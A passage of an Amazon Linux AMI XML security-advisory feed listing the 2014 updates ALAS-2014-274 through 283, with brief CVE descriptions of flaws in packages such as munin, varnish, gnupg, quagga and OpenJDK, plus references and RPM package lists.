</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4353" title="" id="CVE-2013-4353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6449" title="" id="CVE-2013-6449" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6450" title="" id="CVE-2013-6450" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0015.html" title="" id="RHSA-2014:0015" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1e" 
release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1e-4.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-274</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-274: medium priority package update for nss</title><issued date="2014-01-14 15:56:00" /><updated date="2014-09-16 22:17:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2013:1861.html" title="" id="RHSA-2013:1861" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-tools" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.15.3" release="3.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-tools-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.15.3-3.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-275</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-275: medium priority package update for munin</title><issued date="2014-01-14 15:57:00" /><updated date="2014-09-16 22:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6359:
Munin::Master::Node in Munin before 2.0.18 allows remote attackers to cause a denial of service (abort data collection for node) via a plugin that uses "multigraph" as a multigraph service name.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
CVE-2013-6048:
The get_group_tree function in lib/Munin/Master/HTMLConfig.pm in Munin before 2.0.18 allows remote nodes to cause a denial of service (infinite loop and memory consumption in the munin-html process) via crafted multigraph data.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6048" title="" id="CVE-2013-6048" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6359" title="" id="CVE-2013-6359" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="munin-cgi" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-cgi-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-common" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-nginx" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-nginx-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-netip-plugins" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-netip-plugins-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-async" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-ruby-plugins" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-ruby-plugins-2.0.19-1.32.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-276</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-276: medium priority package update for varnish</title><issued date="2014-01-14 16:09:00" /><updated date="2014-09-16 22:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4484:
Varnish before 3.0.5 allows remote attackers to cause a denial of service (child-process crash and temporary caching outage) via a GET request with trailing whitespace characters and no URI.
1025127:
CVE-2013-4484 varnish: denial of service handling certain GET requests
CVE-2013-0345:
915412:
CVE-2013-0345 varnish: world-readable log files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0345" title="" id="CVE-2013-0345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4484" title="" id="CVE-2013-4484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="varnish-libs-devel" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-devel-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-libs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-docs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-docs-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-debuginfo-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-debuginfo-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish-docs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-docs-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish-libs-devel" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-devel-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish-libs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish" version="3.0.5" release="1.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/varnish-3.0.5-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-277</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-277: important priority package update for xorg-x11-server</title><issued date="2014-01-14 16:16:00" /><updated date="2014-09-16 22:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6424:
An integer overflow, which led to a heap-based buffer overflow, was found in the way X.Org server handled trapezoids. A malicious, authorized client could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6424" title="" id="CVE-2013-6424" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1868.html" title="" id="RHSA-2013:1868" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-devel" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.13.0-23.1.36.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.13.0" 
release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-278</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-278: medium priority package update for gnupg</title><issued date="2014-01-14 16:18:00" /><updated date="2014-09-16 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4576:
It was found that GnuPG was vulnerable to side-channel attacks via acoustic cryptanalysis. An attacker in close range to a target system that is decrypting ciphertexts could possibly use this flaw to recover the RSA secret key from that system.
GnuPG 1.x before 1.4.16 generates RSA keys using sequences of introductions with certain patterns that introduce a side channel, which allows physically proximate attackers to extract RSA keys via a chosen-ciphertext attack and acoustic cryptanalysis during decryption. NOTE: applications are not typically expected to protect themselves from acoustic side-channel attacks, since this is arguably the responsibility of the physical device. Accordingly, issues of this type would not normally receive a CVE identifier. However, for this issue, the developer has specified a security policy in which GnuPG should offer side-channel resistance, and developer-specified security-policy violations are within the scope of CVE.
1043327:
CVE-2013-4576 gnupg: RSA secret key recovery via acoustic cryptanalysis
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4576" title="" id="CVE-2013-4576" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg-debuginfo" version="1.4.16" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.16-2.23.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.16" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.16-2.23.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.16" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.16-2.23.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.16" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.16-2.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-279</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-279: medium priority package update for quagga</title><issued date="2014-01-14 17:02:00" /><updated date="2014-09-16 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6051:
The bgp_attr_unknown function in bgp_attr.c in Quagga 0.99.21 does not properly initialize the total variable, which allows remote attackers to cause a denial of service (bgpd crash) via a crafted BGP update.
1043370:
CVE-2013-6051 quagga: bgp crash when receiving bgp updates
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6051" title="" id="CVE-2013-6051" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="quagga-contrib" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.21-6.12.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.21-6.12.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.21-6.12.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.21-6.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-280</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-280: critical priority package update for java-1.7.0-openjdk</title><issued date="2014-01-15 10:28:00" /><updated date="2014-09-16 22:20:00" 
/><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0428:
Multiple improper permission check issues were discovered in the CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0423:
It was discovered that the Beans component did not restrict processing of XML external entities. This flaw could cause a Java application using Beans to leak sensitive information, or affect application availability.
CVE-2014-0422:
Multiple improper permission check issues were discovered in the CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0416:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0411:
It was discovered that the JSSE component could leak timing information during the TLS/SSL handshake. This could possibly lead to disclosure of information about the used encryption keys.
CVE-2014-0376:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0373:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0368:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5910:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5907:
An input validation flaw was discovered in the font layout engine in the 2D component. A specially crafted font file could trigger Java Virtual Machine memory corruption when processed. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2013-5896:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5893:
Multiple improper permission check issues were discovered in the CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5884:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5878:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5878" title="" id="CVE-2013-5878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5884" title="" id="CVE-2013-5884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5893" title="" id="CVE-2013-5893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5896" title="" id="CVE-2013-5896" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5907" title="" id="CVE-2013-5907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5910" title="" id="CVE-2013-5910" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0368" title="" id="CVE-2014-0368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0373" title="" id="CVE-2014-0373" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0376" title="" id="CVE-2014-0376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0411" title="" id="CVE-2014-0411" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0416" title="" id="CVE-2014-0416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0422" title="" id="CVE-2014-0422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0423" title="" id="CVE-2014-0423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0428" title="" id="CVE-2014-0428" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0026.html" title="" id="RHSA-2014:0026" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.51-2.4.4.1.34.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package 
name="java-1.7.0-openjdk-devel" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-281</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-281: medium priority package update for ca-certificates</title><issued date="2014-01-15 11:58:00" /><updated date="2014-09-16 22:20:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2013:1866.html" title="" id="RHSA-2013:1866" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2012.1.95" release="3.12.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2012.1.95-3.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-282</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-282: important priority package update for libXfont</title><issued date="2014-02-03 15:26:00" /><updated date="2014-09-16 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6462:
A stack-based buffer overflow flaw was found in the way the libXfont library parsed Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could exploit this issue to potentially execute arbitrary code with the privileges of the X.Org server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6462" title="" id="CVE-2013-6462" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0018.html" title="" id="RHSA-2014:0018" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXfont-devel" version="1.4.5" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-devel-1.4.5-3.8.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-debuginfo-1.4.5-3.8.amzn1.x86_64.rpm</filename></package><package name="libXfont" version="1.4.5" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-1.4.5-3.8.amzn1.x86_64.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-devel-1.4.5-3.8.amzn1.i686.rpm</filename></package><package name="libXfont" version="1.4.5" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-1.4.5-3.8.amzn1.i686.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-debuginfo-1.4.5-3.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-283</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-283: important priority package update for java-1.6.0-openjdk</title><issued date="2014-02-03 15:27:00" /><updated date="2014-09-16 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0428:
Multiple improper permission check issues were discovered in the CORBA and JNDI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0423:
It was discovered that the Beans component did not restrict processing of XML external entities. This flaw could cause a Java application using Beans to leak sensitive information, or affect application availability.
CVE-2014-0422:
Multiple improper permission check issues were discovered in the CORBA and JNDI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0416:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0411:
It was discovered that the JSSE component could leak timing information during the TLS/SSL handshake. This could possibly lead to a disclosure of information about the used encryption keys.
CVE-2014-0376:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0373:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0368:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5910:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5907:
An input validation flaw was discovered in the font layout engine in the 2D component. A specially crafted font file could trigger a Java Virtual Machine memory corruption when processed. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2013-5896:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
